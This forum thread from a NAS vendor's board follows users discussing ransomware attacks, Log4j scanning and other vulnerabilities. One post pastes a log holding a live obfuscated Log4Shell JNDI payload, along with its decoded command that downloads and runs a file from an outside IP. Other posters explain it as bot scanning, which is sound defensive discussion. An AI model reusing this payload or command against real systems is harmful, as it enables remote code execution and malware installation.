Urgent Notification about TNAS being Attacked by Ransomware

Official announcements and latest news, awards from medias, and sucess stories.
User avatar
LaMosca
Posts: 0
Joined: 23 Jan 2022, 11:23

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by LaMosca »

REBELinBLUE wrote:
>

people should not try. The question is. if it is burnable what happens afterwards?

will they attack? It is as if I try to force the door of your house to see if a thief can enter.

But look at this logo here.

*********************
OTHERS. MORE ATTACKS
*********************

******************************************
IP Address Local: 165.232.155.141
ISP Web: 108.161.168.xxx >------------->>>> My IP Address
Hos Local: 165.232.155.141
Date: 11/01/2022 21:21:46
Port Number: 37564
Operating System: Sistema Operativo Desconocido
User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')
HTTP Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')
******************************************

HTTP Referer: Base64
/TomcatBypass/Command/Base64/>---->>>> wget http://158.101.118.236/setup; curl -O http://158.101.118.236/setup; chmod 777 setup; ./setup exploit

IP Address: ISP Digital Ocean, LLC = 165.232.155.141


IP Address: ISP Digital Ocean, LLC = 137.184.40.48

The question is. Big companies are dedicated to making attacks? on the servers looking for I don't know what?

this is weird.
User avatar
V8Triker
Posts: 82
Joined: 26 Feb 2021, 19:18
Great Britain

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by V8Triker »

LaMosca wrote:

> IP Address: ISP Digital Ocean, LLC = 165.232.155.141
>
>
> IP Address: ISP Digital Ocean, LLC = 137.184.40.48
>
> The question is. Big companies are dedicated to making attacks? on the servers
> looking for I don't know what?
>
> this is weird.



Not so weird.
DigitalOceanprovide rentable cloud servers, so it is someone who hosts a server on DigitalOcean that is attacking you.
I host a server on DigitalOcean, though just for hosting a website.
Report it to DigitalOcean and I am sure the client will have their server removed.

DigitalOcean (referral)- https://m.do.co/c/968520215356
User avatar
REBELinBLUE
Posts: 29
Joined: 05 Dec 2021, 06:37

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by REBELinBLUE »

LaMosca wrote:
> REBELinBLUE wrote:
> >
>
> people should not try. The question is. if it is burnable what happens afterwards?
>
> will they attack? It is as if I try to force the door of your house to see if a thief
> can enter.

I honestly have no idea what you are saying...

As I said, the log shows someone trying to log4j exploit, which doesn't impact the TNAS. Any server connected to the public Internet will show things like this, people looking for wp-admin, various .NET exploits etc it doesn't mean they are exploitable, it means someone was looking to see if they were
User avatar
Charlie_Croker
Posts: 105
Joined: 07 Oct 2020, 19:05

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by Charlie_Croker »

LaMosca wrote:
>

Its often not someone trying to hack your network, its a "bot", these bots crawl the web probing ports looking for vulnerabilities, and some of these aren't bad actors, they're reputable companies looking to discover how many devices have unpatched vulnerabilities, for example my Intrusion Protection System (IPS) reports this address so often that I asked them to remove my WAN IP from the ones they scan. (Their IP is 146.88.240.4 and you can see I am not alone in noticing this ),https://www.abuseipdb.com/check/146.88.240.4 the company is actually https://www.netscout.com

Even hackers don't often pick an IP at random and then try to hack it, (well unless you're a bank the NSA, CIA etc), they send a bot out to find any IPs which might be vulnerable and then use scripts to try to run exploits, this probably happened with the Terramaster and Qlocker attacks, it wasn't someone sat at a PC encrypting your files, it was just a script kiddie :)

As REBELinBLUE said, in your case its ooks to be a bot looking for possible unpatched Log4J https://www.ncsc.gov.uk/information/log ... ds-to-know

More on Bots here https://www.hindawi.com/journals/scn/2017/5960307/
User avatar
REBELinBLUE
Posts: 29
Joined: 05 Dec 2021, 06:37

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by REBELinBLUE »

Fair point, hadn't thought about it possibly just being a reputable organisation "just looking" as it were

https://www.abuseipdb.com/check/158.101.118.236
User avatar
Charlie_Croker
Posts: 105
Joined: 07 Oct 2020, 19:05

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by Charlie_Croker »

It seems those of us who are QNAP users have discovered another new Ransomware exploit in the last 24 hours, called "Deadbolt" https://forum.qnap.com/viewtopic.php?f= ... 7&start=15 (Thanks to my Firewall, so far I have not been attacked successfully yet!).

Be careful people,
User avatar
Charlie_Croker
Posts: 105
Joined: 07 Oct 2020, 19:05

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by Charlie_Croker »

And more on Deadbolt. (QNAP exploit for now). But hopefully one TM are aware of and ensuring its not an exploit on TM devices https://www.reddit.com/r/qnap/comments/ ... nst_qnaps/
User avatar
crisisacting
Posts: 258
Joined: 20 Jan 2022, 16:42

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by crisisacting »

There's another … CVE-2021-4034 (PwnKit): https://www.bleepingcomputer.com/news/s ... -released/

As this affects most Linux distributions, openWRT is likely impacted as well.
User avatar
TMroy
TerraMaster Team
Posts: 2578
Joined: 10 Mar 2020, 14:04
China

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by TMroy »

crisisacting wrote: 27 Jan 2022, 03:26 There's another … CVE-2021-4034 (PwnKit): https://www.bleepingcomputer.com/news/s ... -released/

As this affects most Linux distributions, openWRT is likely impacted as well.
pkexec has not been used in TOS.
To contact our team, please send email to following addresses, remember to replace (at) with @:
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
User avatar
peter.horsley
Posts: 3
Joined: 22 Feb 2021, 08:44

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by peter.horsley »

Short version: I see the word "ransomwar" (no e) in the HDMI console of a fresh install of TOS, downloaded from the official website. I took a photo of it which you can see via the below line. Can anyone explain this?

https://www.dropbox.com/s/vp31acfsneabs ... r.jpg?dl=0

Long version:
I noticed there was kinsing miner evidence on my NAS, and then started seeing files getting created including a readme.txt stating "All files are gone" with my email address, so it looks like a ransomware attach was in progress. I was shocked to find out about UPNP default settings that mean the NAS is accessible to the public internet. I have now disabled UPNP on my router. Then I took out all HDDs, put them in another computer and deleted all partitions. Then I tried to boot TNAS again but it failed to get an IP address. So I plugged in HDMI and noticed it was stuck trying to boot of the internal USB. So I found the instructions on how to re-image the USB drive after after several unsuccessful attempts, I found the dropbox link to the bzImage archive which did work (after changing grub-install to grub2-install in make_install). Once booted, I went to initialize, inserted HDDs, but it failed to install the latest TOS image 4.2.28 at 55%. I tried the 2nd latest image 4.1.27 and it succeeded. All this time I had the HDMI plugged to monitor progress. I noticed the word "ransomwar" appear as shown in the above photo on boot of 4.1.27 which is highly concerning considering this is a freshly image USB and freshly initialized TOS downloaded today with blank HDDs inserted. After upgrading to 4.2.28, I don't see that message on boot in the console anymore. It makes me wonder whether the official 4.1.27 contains ransomware!!

Can support please explain what is shown in the photo please?
Post Reply